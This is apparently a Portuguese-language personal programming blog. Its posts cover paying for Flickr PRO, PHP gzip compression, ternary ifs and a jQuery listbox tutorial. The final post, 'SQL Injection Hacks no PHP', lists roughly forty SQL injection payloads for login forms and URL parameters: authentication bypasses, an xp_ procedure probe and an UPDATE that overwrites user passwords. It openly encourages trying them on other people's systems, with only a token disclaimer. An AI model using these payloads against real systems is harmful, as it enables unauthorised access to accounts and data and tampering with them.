Silici0 :: Blog

Ja tenho visto uma discução enorme sobre o Flickr ser somente pago com cartões de crédito e não com boleto bancário, gerando um descontentamento de um grande parte de seus usuários. Mas a alegria chegou, agora uma das possibilidades é o pagamento atraves de deposito, o que deve ter gerado uma fortuna para o Yahoo! Flickr.

Eu sou um felizardo que pagou e obtive uma conta Flickr PRO, estou me divertindo muito enviando meus albuns de fotos para o Flickr; e o meu Script em php de fotos utilizando o phpFlickr está aumentando, criarei novas funções, paginações e entre outros está no plano.

Após o pagamento você deve esperar a confirmação para utilizar sua conta como PRO, no meu caso foi uma espera de 1/2 dias, gostei muito, apesar de ser depósito foi bastante ágil.

Utilize menos banda em seus sites

Segue uma dica para seus sites porno, de como salvar banda de trafeco. Para isso basta adicionar as linhas abaixos no inicio dos arquivos php do site. Recomendo um include na parada né.

PHP:

@ini_set(’zlib.output_compression_level’, 1);
@ob_start(’ob_gzhandler’);

Isso vai dizer para o servidor automaticamente comprimir os arquivos antes de enviar para o browser cliente. Lembrando também que pode gerar excesso de leitura do servidor, gerando uma lerdesa na resposta, o que dificilmente o cliente irá perceber.

IF de uma linha no PHP

Como é bastante comum no meio de uma concatenação em PHP, fecha a concatenação para fazer um IF então depois abre-se de novo, criando no meio do texto diversas linhas desnecessárias . Para esse problema temos o if de uma linha usada no meio da concatenação, vejamos primeiro como é a estrutura do IF:

PHP:

if( $X == $Y ){
echo 'Ae';
}else{
echo 'não ae';
}

No caso imaginemos que ipotéticamente queremos fazer esse teste no meio de um texto ou uma string longa, não precisamos utilizar o mesmo if, podemos simplesmente concatena-lo ao texto, torando mais limpo e rápida a estrutura, assim:

PHP:

echo 'Texto longo ... na na na '.($x == $Y ? 'caso verdadeiro' : 'caso negativo').' continua o texto';

Pronto no caso acima testamos se a variável X é igual a Y, se for verdadeiro ele concatena 'caso verdadeiro', caso não seja verdade ele concatena 'caso negativo'. Testem, usem a imaginação e chega desses códigos com zilhões de linhas sem necessidade. Vou colocando dicas aos poucos.

Do SelectBox para o ListBox

Tutorialzinho para criarmos um selectbox e um listbox apartir do formulário em html e então através do JQuery adicionarmos os itens no Listbox e então pegarmos o valor por método POST no PHP.

A idéia do tutorial seria uma lista de itens adicionado a um listbox, formando um carrinho de compras dos itens, para depois então enviarmos tudo de uma vez so através do POST do form, gerando uma array para o PHP, é um dos clássicos em programação. Como muita gente não sabe da possibilidade em html/php deixo um tutorial para se ter uma idéia de como utilizar esse recurso.
Sem mais delongas vamos ao código, primeiramente o form, claramente veremos que o nosso listbox na verdade é um selectbox com a tag de multiple (virando assim um listbox):

HTML:

<form method="post" enctype="multipart/form-data" name="F1" id="F1">
<select name="func" id="func">
<option value="1">Numero 1</option>
<option value="2">Numero 2</option>
<option value="3">Numero 3</option>
</select>
<input type="button" name="add" value="Adicionar" />
<select multiple="multiple" id="eq" name="eq[]" size="7">
</select>
<input name="Submit2" type="submit" id="EnvioDados" value="ENVIAR DADOS">
</form>

JAVASCRIPT:

$().ready(function() {
//Click do botão ADD
$("input[@name=add]").click(function(){
var id_selecionado = document.F1.func.selectedIndex;
var valor_selecionado = document.F1.func.options[id_selecionado].text;
var id_indice_selecionado = document.F1.func.options[id_selecionado].value;
$('select[@id=eq]').append('<option value="'+ id_indice_selecionado +'">'+ valor_selecionado +'</option>');
//desabilita o valor adicionado;
document.F1.func.options[id_selecionado].disabled=true;
});
// Click do botao do submit
$('input[@name=Submit2]').click(function(){
var x=document.getElementById("eq");
for (i=0;i<x.length;i++){
x.options[i].selected=true;
}
return true;
});
})

Muito legal né? Mas e para remover ? Bom, para remover eu recomendo dar uma procurada na net sobre um plugin para ListBox usando o JQuery, vocês não querem tudo na mão né? Dúvidas e sugestões é so comentar.

SQL Injection Hacks no PHP

Continuando a diversão de se fazer testes no seu sistema ou se divertir com sistemas de outros segue uma lista de possíveis SQL injections, lembrando que pode-se utilizar tanto no login/senha no form ou como na url quando se utilizam método de $_GET no php, vamos lá:

HTML:

user:admin
pass:' or 1=1--
user:' or 1=1--
admin:' or 1=1--
password:' or 1=1--
admin:' or a=a--
admin:' or 1=1--
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
1 OR 1=1
1' OR '1'='1
1'1
1 EXEC SP_ (or EXEC XP_)
1 AND 1=1
1' AND 1=(SELECT COUNT(*) FROM tablenames); --
" AND user like %name% --
"; select user like %name% --
"; update users set passw = 'newpass' where user like %name% --

Existem diversas outras formas de se fazer ataques e fazer antes pesquisas de versões, match, vetores, mapiamento do mysql e até mesmo com user do mysql interno. Mas por hoje fica a lista por aqui, lembrando que fica por sua conta e risco, isso é somente um informativo...